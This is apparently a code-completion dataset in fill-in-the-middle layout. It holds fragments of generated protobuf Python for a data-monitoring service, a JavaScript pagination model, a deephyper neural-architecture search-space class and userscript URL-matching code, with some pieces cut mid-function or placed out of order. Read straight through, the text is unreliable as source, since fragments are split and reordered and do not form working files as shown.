'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _CREATEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateProfilerRequest.Response)
})
,
'DESCRIPTOR' : _CREATEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateProfilerRequest)
})
_sym_db.RegisterMessage(CreateProfilerRequest)
_sym_db.RegisterMessage(CreateProfilerRequest.Response)
GetProfilerRequest = _reflection.GeneratedProtocolMessageType('GetProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _GETPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.GetProfilerRequest.Response)
})
,
'DESCRIPTOR' : _GETPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.GetProfilerRequest)
})
_sym_db.RegisterMessage(GetProfilerRequest)
_sym_db.RegisterMessage(GetProfilerRequest.Response)
UpdateProfilerRequest = _reflection.GeneratedProtocolMessageType('UpdateProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _UPDATEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateProfilerRequest.Response)
})
,
'DESCRIPTOR' : _UPDATEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateProfilerRequest)
})
_sym_db.RegisterMessage(UpdateProfilerRequest)
_sym_db.RegisterMessage(UpdateProfilerRequest.Response)
ListProfilersRequest = _reflection.GeneratedProtocolMessageType('ListProfilersRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _LISTPROFILERSREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.ListProfilersRequest.Response)
})
,
'DESCRIPTOR' : _LISTPROFILERSREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.ListProfilersRequest)
})
_sym_db.RegisterMessage(ListProfilersRequest)
_sym_db.RegisterMessage(ListProfilersRequest.Response)
DeleteProfilerRequest = _reflection.GeneratedProtocolMessageType('DeleteProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _DELETEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeleteProfilerRequest.Response)
})
,
'DESCRIPTOR' : _DELETEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeleteProfilerRequest)
})
_sym_db.RegisterMessage(DeleteProfilerRequest)
_sym_db.RegisterMessage(DeleteProfilerRequest.Response)
BuildStatusEnum = _reflection.GeneratedProtocolMessageType('BuildStatusEnum', (_message.Message,), {
'DESCRIPTOR' : _BUILDSTATUSENUM,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.BuildStatusEnum)
})
_sym_db.RegisterMessage(BuildStatusEnum)
DeployStatusEnum = _reflection.GeneratedProtocolMessageType('DeployStatusEnum', (_message.Message,), {
'DESCRIPTOR' : _DEPLOYSTATUSENUM,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeployStatusEnum)
})
_sym_db.RegisterMessage(DeployStatusEnum)
ProfilerStatus = _reflection.GeneratedProtocolMessageType('ProfilerStatus', (_message.Message,), {
'DESCRIPTOR' : _PROFILERSTATUS,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.ProfilerStatus)
})
_sym_db.RegisterMessage(ProfilerStatus)
GetProfilerStatusRequest = _reflection.GeneratedProtocolMessageType('GetProfilerStatusRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _GETPROFILERSTATUSREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.GetProfilerStatusRequest.Response)
})
,
'DESCRIPTOR' : _GETPROFILERSTATUSREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.GetProfilerStatusRequest)
})
_sym_db.RegisterMessage(GetProfilerStatusRequest)
_sym_db.RegisterMessage(GetProfilerStatusRequest.Response)
FindProfilersForMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('FindProfilersForMonitoredEntityRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _FINDPROFILERSFORMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.FindProfilersForMonitoredEntityRequest)
})
_sym_db.RegisterMessage(FindProfilersForMonitoredEntityRequest)
_sym_db.RegisterMessage(FindProfilersForMonitoredEntityRequest.Response)
KeyValue = _reflection.GeneratedProtocolMessageType('KeyValue', (_message.Message,), {
'DESCRIPTOR' : _KEYVALUE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.KeyValue)
})
_sym_db.RegisterMessage(KeyValue)
ValueTypeEnum = _reflection.GeneratedProtocolMessageType('ValueTypeEnum', (_message.Message,), {
'DESCRIPTOR' : _VALUETYPEENUM,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.ValueTypeEnum)
})
_sym_db.RegisterMessage(ValueTypeEnum)
EnableProfilerRequest = _reflection.GeneratedProtocolMessageType('EnableProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _ENABLEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.EnableProfilerRequest.Response)
})
,
'DESCRIPTOR' : _ENABLEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.EnableProfilerRequest)
})
_sym_db.RegisterMessage(EnableProfilerRequest)
_sym_db.RegisterMessage(EnableProfilerRequest.Response)
DisableProfilerRequest = _reflection.GeneratedProtocolMessageType('DisableProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _DISABLEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DisableProfilerRequest.Response)
})
,
'DESCRIPTOR' : _DISABLEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DisableProfilerRequest)
})
_sym_db.RegisterMessage(DisableProfilerRequest)
_sym_db.RegisterMessage(DisableProfilerRequest.Response)
MonitoredEntity = _reflection.GeneratedProtocolMessageType('MonitoredEntity', (_message.Message,), {
'AttributesEntry' : _reflection.GeneratedProtocolMessageType('AttributesEntry', (_message.Message,), {
'DESCRIPTOR' : _MONITOREDENTITY_ATTRIBUTESENTRY,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.MonitoredEntity.AttributesEntry)
})
,
'DESCRIPTOR' : _MONITOREDENTITY,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.MonitoredEntity)
})
_sym_db.RegisterMessage(MonitoredEntity)
_sym_db.RegisterMessage(MonitoredEntity.AttributesEntry)
CreateMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('CreateMonitoredEntityRequest', (_message.Message,), {
'AttributesEntry' : _reflection.GeneratedProtocolMessageType('AttributesEntry', (_message.Message,), {
'DESCRIPTOR' : _CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry)
})
,
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _CREATEMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _CREATEMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateMonitoredEntityRequest)
})
_sym_db.RegisterMessage(CreateMonitoredEntityRequest)
_sym_db.RegisterMessage(CreateMonitoredEntityRequest.AttributesEntry)
_sym_db.RegisterMessage(CreateMonitoredEntityRequest.Response)
UpdateMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('UpdateMonitoredEntityRequest', (_message.Message,), {
'AttributesEntry' : _reflection.GeneratedProtocolMessageType('AttributesEntry', (_message.Message,), {
'DESCRIPTOR' : _UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry)
})
,
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _UPDATEMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _UPDATEMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateMonitoredEntityRequest)
})
_sym_db.RegisterMessage(UpdateMonitoredEntityRequest)
_sym_db.RegisterMessage(UpdateMonitoredEntityRequest.AttributesEntry)
_sym_db.RegisterMessage(UpdateMonitoredEntityRequest.Response)
FindMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('FindMonitoredEntityRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _FINDMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.FindMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _FINDMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.FindMonitoredEntityRequest)
})
_sym_db.RegisterMessage(FindMonitoredEntityRequest)
_sym_db.RegisterMessage(FindMonitoredEntityRequest.Response)
DeleteMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('DeleteMonitoredEntityRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _DELETEMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeleteMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _DELETEMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeleteMonitoredEntityRequest)
})
_sym_db.RegisterMessage(DeleteMonitoredEntityRequest)
_sym_db.RegisterMessage(DeleteMonitoredEntityRequest.Response)
DESCRIPTOR._options = None
_MONITOREDENTITY_ATTRIBUTESENTRY._options = None
_CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY._options = None
_UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY._options = None
_DATAMONITORINGSERVICE = _descriptor.ServiceDescriptor(
name='DataMonitoringService',
full_name='ai.verta.monitoring.DataMonitoringService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=3653,
serialized_end=6165,
methods=[
_descriptor.MethodDescriptor(
name='createMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.createMonitoredEntity',
index=0,
containing_service=None,
input_type=_CREATEMONITOREDENTITYREQUEST,
output_type=_CREATEMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002>\"9/api/v1/monitoring/monitored_entity/createMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='updateMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.updateMonitoredEntity',
index=1,
containing_service=None,
input_type=_UPDATEMONITOREDENTITYREQUEST,
output_type=_UPDATEMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002>29/api/v1/monitoring/monitored_entity/updateMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='findMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.findMonitoredEntity',
index=2,
containing_service=None,
input_type=_FINDMONITOREDENTITYREQUEST,
output_type=_FINDMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002<\"7/api/v1/monitoring/monitored_entity/findMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='deleteMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.deleteMonitoredEntity',
index=3,
containing_service=None,
input_type=_DELETEMONITOREDENTITYREQUEST,
output_type=_DELETEMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002>*9/api/v1/monitoring/monitored_entity/deleteMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='getProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.getProfiler',
index=4,
containing_service=None,
input_type=_GETPROFILERREQUEST,
output_type=_GETPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0021\022//api/v1/monitoring/monitored_entity/getProfiler',
),
_descriptor.MethodDescriptor(
name='createProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.createProfiler',
index=5,
containing_service=None,
input_type=_CREATEPROFILERREQUEST,
output_type=_CREATEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0027\"2/api/v1/monitoring/monitored_entity/createProfiler:\001*',
),
_descriptor.MethodDescriptor(
name='updateProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.updateProfiler',
index=6,
containing_service=None,
input_type=_UPDATEPROFILERREQUEST,
output_type=_UPDATEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002722/api/v1/monitoring/monitored_entity/updateProfiler:\001*',
),
_descriptor.MethodDescriptor(
name='listProfilers',
full_name='ai.verta.monitoring.DataMonitoringService.listProfilers',
index=7,
containing_service=None,
input_type=_LISTPROFILERSREQUEST,
output_type=_LISTPROFILERSREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0023\0221/api/v1/monitoring/monitored_entity/listProfilers',
),
_descriptor.MethodDescriptor(
name='deleteProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.deleteProfiler',
index=8,
containing_service=None,
input_type=_DELETEPROFILERREQUEST,
output_type=_DELETEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0026*1/api/v1/monitoring/monitored_entity/deleteProfile:\001*',
),
_descriptor.MethodDescriptor(
name='getProfilerStatus',
full_name='ai.verta.monitoring.DataMonitoringService.getProfilerStatus',
index=9,
containing_service=None,
input_type=_GETPROFILERSTATUSREQUEST,
output_type=_GETPROFILERSTATUSREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0027\0225/api/v1/monitoring/monitored_entity/getProfilerStatus',
),
_descriptor.MethodDescriptor(
name='findProfilersForMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.findProfilersForMonitoredEntity',
index=10,
containing_service=None,
input_type=_FINDPROFILERSFORMONITOREDENTITYREQUEST,
output_type=_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002H\"C/api/v1/monitoring/monitored_entity/findProfilersForMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='enableProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.enableProfiler',
index=11,
containing_service=None,
input_type=_ENABLEPROFILERREQUEST, | output_type=_ENABLEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0027\"2/api/v1/monitoring/monitored_entity/enableProfiler:\001*',
),
_descriptor.MethodDescriptor(
name='disableProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.disableProfiler',
index=12,
containing_service=None,
input_type=_DISABLEPROFILERREQUEST,
output_type=_DISABLEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0028\"3/api/v1/monitoring/monitored_entity/disableProfiler:\001*',
),
])
_sym_db.RegisterServiceDescriptor(_DATAMONITORINGSERVICE)
DESCRIPTOR.services_by_name['DataMonitoringService'] = _DATAMONITORINGSERVICE
# @@protoc_insertion_point(module_scope) | |
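# Hand-added usage sketch (not protoc output): exercises the generated message
# classes registered above. The class and field names come from the descriptors
# in this module; the concrete values below are hypothetical.
if __name__ == '__main__':
    req = CreateMonitoredEntityRequest(
        name='example-entity',              # hypothetical entity name
        workspace_id=42,                    # one arm of the workspace_identifier oneof
        attributes={'team': 'monitoring'},  # map<string, string> AttributesEntry
    )
    data = req.SerializeToString()          # encode to wire format
    restored = CreateMonitoredEntityRequest.FromString(data)
    assert restored.WhichOneof('workspace_identifier') == 'workspace_id'
    assert restored.attributes['team'] == 'monitoring'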
model.js | export function | (pageCount, currentPage, showPages, marginPageCount, surroundingPageCount) {
const pages = []
if (showPages) {
const pageNums = []
const addPage = (n) => {
if (n >= 1 && n <= pageCount) {
pageNums.push(n)
}
}
// Start by defining the window of pages to show around the current page.
// If the window goes off either edge, shift it until it fits.
let extentLeft = currentPage - surroundingPageCount
let extentRight = currentPage + surroundingPageCount
if (extentLeft < 1 && extentRight > pageCount) {
// Our window is larger than the entire range,
// so simply display every page.
extentLeft = 1
extentRight = pageCount
} else if (extentLeft < 1) {
while (extentLeft < 1) {
extentLeft++
extentRight++
}
} else if (extentRight > pageCount) {
while (extentRight > pageCount) {
extentLeft--
extentRight--
}
}
// Next, include the pages in the margins.
// If a margin page is already covered in the window,
// extend the window to the other direction.
for (let i = 1; i <= marginPageCount; i++) {
const leftPage = i
const rightPage = pageCount - (i - 1)
if (leftPage >= extentLeft) {
extentRight++
} else {
addPage(leftPage)
}
if (rightPage <= extentRight) {
extentLeft--
} else {
addPage(rightPage)
}
}
for (let i = extentLeft; i <= extentRight; i++) {
addPage(i)
}
const sorted = pageNums
.slice()
.sort((a, b) => a - b)
.filter((item, idx, ary) => !idx || item !== ary[idx - 1])
for (let idx = 0; idx < sorted.length; idx++) {
const num = sorted[idx]
const selected = num === currentPage
if (idx === 0) {
if (num !== 1) {
// If the first page isn't page one,
// we need to add a break
pages.push({
type: 'BREAK',
num: 1,
})
}
pages.push({
type: 'NUM',
num,
selected,
})
} else {
const last = sorted[idx - 1]
const delta = num - last
if (delta === 1) {
pages.push({
type: 'NUM',
num,
selected,
})
} else {
// We skipped some, so add a break
pages.push({
type: 'BREAK',
num: num - 1,
})
pages.push({
type: 'NUM',
num,
selected,
})
}
}
}
const lastPage = pages[pages.length - 1]
if (lastPage.type === 'NUM' && lastPage.num !== pageCount) {
// The last page we rendered wasn't the actual last page,
// so we need an additional break
pages.push({
type: 'BREAK',
num: pageCount,
})
}
}
const prev = {type: 'PREV', num: currentPage - 1, disabled: currentPage === 1}
const next = {type: 'NEXT', num: currentPage + 1, disabled: currentPage === pageCount}
return [prev, ...pages, next]
}
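// Worked example (sketch): buildPaginationModel(10, 5, true, 1, 2) yields
// [PREV, 1, BREAK, 3, 4, 5 (selected), 6, 7, BREAK, 10, NEXT]: a window of
// surroundingPageCount pages on each side of the current page, one margin
// page at each edge, and BREAK items covering the gaps.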
export function buildComponentData(page, hrefBuilder, onClick) {
const props = {}
let content = ''
let key = ''
switch (page.type) {
case 'PREV': {
key = 'page-prev'
content = 'Previous'
if (page.disabled) {
Object.assign(props, {as: 'span', 'aria-disabled': 'true'})
} else {
Object.assign(props, {
rel: 'prev',
href: hrefBuilder(page.num),
'aria-label': 'Previous Page',
onClick,
})
}
break
}
case 'NEXT': {
key = 'page-next'
content = 'Next'
if (page.disabled) {
Object.assign(props, {as: 'span', 'aria-disabled': 'true'})
} else {
Object.assign(props, {
rel: 'next',
href: hrefBuilder(page.num),
'aria-label': 'Next Page',
onClick,
})
}
break
}
case 'NUM': {
key = `page-${page.num}`
content = page.num
if (page.selected) {
Object.assign(props, {as: 'em', 'aria-current': 'page'})
} else {
Object.assign(props, {href: hrefBuilder(page.num), 'aria-label': `Page ${page.num}`, onClick})
}
break
}
case 'BREAK': {
key = `page-${page.num}-break`
content = '…'
Object.assign(props, {as: 'span', 'aria-disabled': true})
}
}
return {props, key, content}
}
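// Sketch: buildComponentData({type: 'NUM', num: 3, selected: false}, n => `#p${n}`, fn)
// returns {props: {href: '#p3', 'aria-label': 'Page 3', onClick: fn}, key: 'page-3', content: 3}.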
| buildPaginationModel |
keras_search_space.py | from collections.abc import Iterable
from functools import reduce
import networkx as nx
from tensorflow import keras
from tensorflow.python.keras.utils.vis_utils import model_to_dot
from deephyper.core.exceptions.nas.space import (InputShapeOfWrongType,
NodeAlreadyAdded,
StructureHasACycle,
WrongOutputShape,
WrongSequenceToSetOperations)
from deephyper.search.nas.model.space import NxSearchSpace
from deephyper.search.nas.model.space.node import (ConstantNode, Node,
VariableNode)
from deephyper.search.nas.model.space.op.basic import Tensor
from deephyper.search.nas.model.space.op.merge import Concatenate
from deephyper.search.nas.model.space.op.op1d import Identity
class KSearchSpace(NxSearchSpace):
"""A KSearchSpace represents a search space of neural networks.
>>> from tensorflow.keras.utils import plot_model
>>> from deephyper.search.nas.model.space import KSearchSpace
>>> from deephyper.search.nas.model.space.node import VariableNode, ConstantNode
>>> from deephyper.search.nas.model.space.op.op1d import Dense
>>> struct = KSearchSpace((5, ), (1, ))
>>> vnode = VariableNode()
>>> struct.connect(struct.input_nodes[0], vnode)
>>> vnode.add_op(Dense(10))
>>> vnode.add_op(Dense(20))
>>> output_node = ConstantNode(op=Dense(1))
>>> struct.connect(vnode, output_node)
>>> struct.set_ops([0])
>>> model = struct.create_model()
Args:
input_shape (list(tuple(int))): list of shapes of all inputs.
output_shape (tuple(int)): shape of output.
Raises:
        InputShapeOfWrongType: raised when input_shape is neither a tuple nor a list of tuples.
"""
def __init__(self, input_shape, output_shape, *args, **kwargs):
super().__init__()
if type(input_shape) is tuple:
# we have only one input tensor here
op = Tensor(keras.layers.Input(input_shape, name="input_0"))
self.input_nodes = [ConstantNode(op=op, name='Input_0')]
elif type(input_shape) is list and all(map(lambda x: type(x) is tuple, input_shape)):
# we have a list of input tensors here
self.input_nodes = list()
for i in range(len(input_shape)):
op = Tensor(keras.layers.Input(
input_shape[i], name=f"input_{i}"))
inode = ConstantNode(op=op, name=f'Input_{i}')
self.input_nodes.append(inode)
else:
raise InputShapeOfWrongType(input_shape)
for node in self.input_nodes:
self.graph.add_node(node)
self.output_shape = output_shape
self.output_node = None
self._model = None
@property
def depth(self):
if self._model is None:
raise RuntimeError(
"Can't compute depth of model without creating a model.")
return len(self.longest_path)
@property
def longest_path(self):
if self._model is None:
raise RuntimeError(
"Can't compute longest path of model without creating a model.")
nx_graph = nx.drawing.nx_pydot.from_pydot(model_to_dot(self._model))
return nx.algorithms.dag.dag_longest_path(nx_graph)
def set_ops(self, indexes):
"""Set the operations for each node of each cell of the search_space.
Args:
indexes (list): element of list can be float in [0, 1] or int.
Raises:
WrongSequenceToSetOperations: raised when 'indexes' is of a wrong length.
"""
if len(indexes) != len(list(self.variable_nodes)):
raise WrongSequenceToSetOperations(
indexes, list(self.variable_nodes))
for op_i, node in zip(indexes, self.variable_nodes):
node.set_op(op_i)
output_nodes = self.get_output_nodes()
self.output_node = self.set_output_node(self.graph, output_nodes)
def set_output_node(self, graph, output_nodes):
"""Set the output node of the search_space.
Args:
graph (nx.DiGraph): graph of the search_space.
output_nodes (Node): nodes of the current search_space without successors.
Returns:
Node: output node of the search_space.
"""
if len(output_nodes) == 1:
node = ConstantNode(op=Identity(), name='Structure_Output')
graph.add_node(node)
graph.add_edge(output_nodes[0], node)
else:
node = ConstantNode(name='Structure_Output')
op = Concatenate(self, output_nodes) | """Create the tensors corresponding to the search_space.
Returns:
A keras.Model for the current search_space with the corresponding set of operations.
"""
output_tensor = self.create_tensor_aux(self.graph, self.output_node)
if output_tensor.get_shape()[1:] != self.output_shape:
raise WrongOutputShape(output_tensor, self.output_shape)
input_tensors = [inode._tensor for inode in self.input_nodes]
self._model = keras.Model(inputs=input_tensors, outputs=output_tensor)
return keras.Model(inputs=input_tensors, outputs=output_tensor) | node.set_op(op=op)
return node
def create_model(self): |
tester.js | import * as tld from '#/common/tld';
import cache from './cache';
import { getOption, hookOptions } from './options';
tld.initTLD(true);
const RE_MATCH_PARTS = /(.*?):\/\/([^/]*)\/(.*)/;
let blacklistRules = [];
hookOptions((changes) => {
if ('blacklist' in changes) resetBlacklist(changes.blacklist || '');
});
const RE_HTTP_OR_HTTPS = /^https?$/i;
/*
Simple FIFO queue for the results of testBlacklist, cached separately from the main |cache|
because the blacklist is updated only once in a while so its entries would be crowding
the main cache and reducing its performance (objects with lots of keys are slow to access).
We also don't need to auto-expire the entries after a timeout.
The only limit we're concerned with is the overall memory used.
The limit is specified in the amount of unicode characters (string length) for simplicity.
Disregarding deduplication due to interning, the actual memory used is approximately twice as big:
2 * keyLength + objectStructureOverhead * objectCount
*/
const MAX_BL_CACHE_LENGTH = 100e3;
let blCache = {};
let blCacheSize = 0;
/**
* Test glob rules like `@include` and `@exclude`.
*/
export function testGlob(url, rules) {
return rules.some((rule) => {
const key = `re:${rule}`;
let re = cache.get(key);
if (re) {
cache.hit(key);
} else {
re = autoReg(rule);
cache.put(key, re);
}
return re.test(url);
});
}
/**
* Test match rules like `@match` and `@exclude_match`.
*/
export function testMatch(url, rules) {
return rules.some((rule) => {
const key = `match:${rule}`;
let matcher = cache.get(key);
if (matcher) {
cache.hit(key);
} else {
matcher = matchTester(rule);
cache.put(key, matcher);
}
return matcher.test(url);
});
}
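// Worked examples (sketch, hypothetical URLs and rules):
//   testMatch('https://www.example.com/p', ['*://*.example.com/*']) // -> true
//   testGlob('https://example.com/a', ['https://example.com/*'])    // -> true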
export function testScript(url, script) {
const { custom, meta } = script;
const mat = mergeLists(custom.origMatch && meta.match, custom.match);
const inc = mergeLists(custom.origInclude && meta.include, custom.include);
const exc = mergeLists(custom.origExclude && meta.exclude, custom.exclude);
const excMat = mergeLists(custom.origExcludeMatch && meta.excludeMatch, custom.excludeMatch);
// match all if no @match or @include rule
let ok = !mat.length && !inc.length;
// @match
ok = ok || testMatch(url, mat);
// @include
ok = ok || testGlob(url, inc);
// @exclude-match
ok = ok && !testMatch(url, excMat);
// @exclude
ok = ok && !testGlob(url, exc);
return ok;
}
function testRegExp(re, text) {
const key = `re-test:${re.source}:${text}`;
let res = cache.get(key);
if (!res) {
res = re.test(text) ? 1 : -1;
cache.put(key, res);
}
return res === 1;
}
function mergeLists(...args) {
return args.reduce((res, item) => (item ? res.concat(item) : res), []);
}
function str2RE(str) {
const re = str.replace(/([.?+[\]{}()|^$])/g, '\\$1').replace(/\*/g, '.*?');
return re;
}
function autoReg(str) {
if (str.length > 1 && str[0] === '/' && str[str.length - 1] === '/') {
return new RegExp(str.slice(1, -1)); // Regular-expression
}
const reStr = str2RE(str);
if (tld.isReady() && str.includes('.tld/')) {
const reTldStr = reStr.replace('\\.tld/', '((?:\\.\\w+)+)/');
return {
test: (tstr) => {
const matches = tstr.match(reTldStr);
if (matches) {
const suffix = matches[1].slice(1);
if (tld.getPublicSuffix(suffix) === suffix) return true;
}
return false;
},
};
}
const re = new RegExp(`^${reStr}$`); // String with wildcards
return { test: tstr => testRegExp(re, tstr) };
}
function matchScheme(rule, data) {
// exact match
if (rule === data) return 1;
// * = http | https
// support http*
if ([
'*',
'http*',
].includes(rule) && RE_HTTP_OR_HTTPS.test(data)) return 1;
return 0;
}
const RE_STR_ANY = '(?:|.*?\\.)';
const RE_STR_TLD = '((?:\\.\\w+)+)';
function hostMatcher(rule) {
// *.example.com
// www.google.*
// www.google.tld
let prefix = '';
let base = rule;
let suffix = '';
if (rule.startsWith('*.')) {
base = base.slice(2);
prefix = RE_STR_ANY;
}
if (tld.isReady() && rule.endsWith('.tld')) {
base = base.slice(0, -4);
suffix = RE_STR_TLD;
}
